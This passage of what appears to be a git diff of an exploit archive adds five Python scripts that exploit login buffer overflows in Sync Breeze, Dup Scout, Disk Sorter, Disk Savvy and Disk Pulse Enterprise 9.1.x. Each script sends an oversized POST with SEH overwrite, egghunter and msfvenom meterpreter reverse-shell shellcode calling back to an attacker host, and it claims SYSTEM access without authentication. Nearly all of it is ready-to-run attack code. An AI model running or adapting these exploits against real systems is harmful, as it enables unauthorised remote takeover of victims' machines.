192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 13664 #subtract/add for payload +evil += "B" * 100 +evil += "w00tw00t" +evil += buf +evil += "\x90" * 212 +evil += nseh +evil += seh +evil += "\x90" * 10 +evil += egghunter +evil += "\x90" * 8672 + + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + + diff --git a/platforms/windows/remote/40831.py b/platforms/windows/remote/40831.py new file mode 100755 index 000000000..06558e545 --- /dev/null +++ b/platforms/windows/remote/40831.py @@ -0,0 +1,100 @@ +#!/usr/bin/python + +print "Sync Breeze Enterprise 9.1.16 Login Buffer Overflow" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Vendor has been notified on multiple occasions +#Exploit for version 8.9.24: www.exploit-db.com/exploits/40456/ + +#Shout-out to carbonated and ozzie_offsec + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.130',80)) + + +#bad chars \x00\x0a\x0d\x26 + + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + + + +buf = "" +buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33" +buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab" +buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d" +buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd" +buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a" +buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e" +buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb" +buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab" +buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85" +buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84" +buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e" +buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34" +buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2" +buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a" +buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0" +buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25" +buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3" +buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9" +buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e" +buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38" +buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4" +buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92" +buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55" +buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde" + + +#pop pop ret 1001A1B8 + +nseh = "\x90\x90\xEB\x0B" +seh = "\xB8\xA1\x01\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 13664 #subtract/add for payload +evil += "B" * 100 +evil += "w00tw00t" +evil += buf +evil += "\x90" * 212 +evil += nseh +evil += seh +evil += "\x90" * 10 +evil += egghunter +evil += "\x90" * 8672 + + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + + diff --git a/platforms/windows/remote/40832.py b/platforms/windows/remote/40832.py new file mode 100755 index 000000000..97e4cf5c8 --- /dev/null +++ b/platforms/windows/remote/40832.py @@ -0,0 +1,100 @@ +#!/usr/bin/python + +print "Dup Scout Enterprise 9.1.14 Login Buffer Overflow" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Vendor has been notified on multiple occasions +#Exploit for version 9.0.28: www.exploit-db.com/exploits/40457/ + +#Shout-out to carbonated and ozzie_offsec + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.130',80)) + + +#bad chars \x00\x0a\x0d\x26 + + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + + + +buf = "" +buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33" +buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab" +buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d" +buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd" +buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a" +buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e" +buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb" +buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab" +buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85" +buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84" +buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e" +buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34" +buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2" +buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a" +buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0" +buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25" +buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3" +buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9" +buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e" +buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38" +buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4" +buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92" +buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55" +buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde" + + +#pop pop ret 1004FAF3 + +nseh = "\x90\x90\xEB\x0B" +seh = "\xF3\xFA\x04\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 13664 #subtract/add for payload +evil += "B" * 100 +evil += "w00tw00t" +evil += buf +evil += "\x90" * 212 +evil += nseh +evil += seh +evil += "\x90" * 10 +evil += egghunter +evil += "\x90" * 8672 + + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + + diff --git a/platforms/windows/remote/40833.py b/platforms/windows/remote/40833.py new file mode 100755 index 000000000..70244d20f --- /dev/null +++ b/platforms/windows/remote/40833.py @@ -0,0 +1,100 @@ +#!/usr/bin/python + +print "Disk Sorter Enterprise 9.1.12 Login Buffer Overflow" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Vendor has been notified on multiple occasions +#Exploit for version 9.0.24: www.exploit-db.com/exploits/40458/ + +#Shout-out to carbonated and ozzie_offsec + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.130',80)) + + +#bad chars \x00\x0a\x0d\x26 + + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + + + +buf = "" +buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33" +buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab" +buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d" +buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd" +buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a" +buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e" +buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb" +buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab" +buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85" +buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84" +buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e" +buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34" +buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2" +buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a" +buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0" +buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25" +buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3" +buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9" +buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e" +buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38" +buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4" +buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92" +buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55" +buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde" + + +#pop pop ret 1004F9DD + +nseh = "\x90\x90\xEB\x0B" +seh = "\xDD\xF9\x04\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 13664 #subtract/add for payload +evil += "B" * 100 +evil += "w00tw00t" +evil += buf +evil += "\x90" * 212 +evil += nseh +evil += seh +evil += "\x90" * 10 +evil += egghunter +evil += "\x90" * 8672 + + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + + diff --git a/platforms/windows/remote/40834.py b/platforms/windows/remote/40834.py new file mode 100755 index 000000000..c4d82e98e --- /dev/null +++ b/platforms/windows/remote/40834.py @@ -0,0 +1,100 @@ +#!/usr/bin/python + +print "Disk Savvy Enterprise 9.1.14 Login Buffer Overflow" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Vendor has been notified on multiple occasions +#Exploit for version 9.0.32: www.exploit-db.com/exploits/40459/ + +#Shout-out to carbonated and ozzie_offsec + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.130',80)) + + +#bad chars \x00\x0a\x0d\x26 + + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + + + +buf = "" +buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33" +buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab" +buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d" +buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd" +buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a" +buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e" +buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb" +buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab" +buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85" +buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84" +buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e" +buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34" +buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2" +buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a" +buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0" +buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25" +buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3" +buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9" +buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e" +buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38" +buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4" +buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92" +buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55" +buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde" + + +#pop pop ret 10081A9C + +nseh = "\x90\x90\xEB\x0B" +seh = "\x9C\x1A\x08\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 13664 #subtract/add for payload +evil += "\x42" * 100 +evil += "w00tw00t" +evil += buf +evil += "\x90" * 212 +evil += nseh +evil += seh +evil += "\x90" * 10 +evil += egghunter +evil += "\x90" * 8672 + + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + + diff --git a/platforms/windows/remote/40835.py b/platforms/windows/remote/40835.py new file mode 100755 index 000000000..e42ffa4c6 --- /dev/null +++ b/platforms/windows/remote/40835.py @@ -0,0 +1,100 @@ +#!/usr/bin/python + +print "Disk Pulse Enterprise 9.1.16 Login Buffer Overflow" +print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" + +#Author website: www.tulpa-security.com +#Author twitter: @tulpa_security + +#Exploit will land you NT AUTHORITY\SYSTEM +#You do not need to be authenticated, password below is garbage +#Swop out IP, shellcode and remember to adjust '\x41' for bytes +#Tested on Windows 7 x86 Enterprise SP1 + +#Vendor has been notified on multiple occasions +#Exploit for version 9.0.34: www.exploit-db.com/exploits/40452/ + +#Shout-out to carbonated and ozzie_offsec + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.123.130',80)) + + +#bad chars \x00\x0a\x0d\x26 + + +#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest + +#payload size 308 + + + +buf = "" +buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33" +buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab" +buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d" +buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd" +buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a" +buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e" +buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb" +buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab" +buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85" +buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84" +buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e" +buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34" +buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2" +buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a" +buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0" +buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25" +buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3" +buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9" +buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e" +buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38" +buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4" +buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92" +buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55" +buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde" + + +#pop pop ret 10015BFE + +nseh = "\x90\x90\xEB\x0B" +seh = "\xFE\x5B\x01\x10" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +evil = "POST /login HTTP/1.1\r\n" +evil += "Host: 192.168.123.132\r\n" +evil += "User-Agent: Mozilla/5.0\r\n" +evil += "Connection: close\r\n" +evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" +evil += "Accept-Language: en-us,en;q=0.5\r\n" +evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" +evil += "Keep-Alive: 300\r\n" +evil += "Proxy-Connection: keep-alive\r\n" +evil += "Content-Type: application/x-www-form-urlencoded\r\n" +evil += "Content-Length: 17000\r\n\r\n" +evil += "username=admin" +evil += "&password=aaaaa\r\n" +evil += "\x41" * 13664 #subtract/add for payload +evil += "B" * 100 +evil += "w00tw00t" +evil += buf +evil += "\x90" * 212 +evil += nseh +evil += seh +evil += "\x90" * 10 +evil += egghunter +evil += "\x90" * 8672 + + +print 'Sending evil buffer...' +s.send(evil) +print 'Payload Sent!' +s.close() + +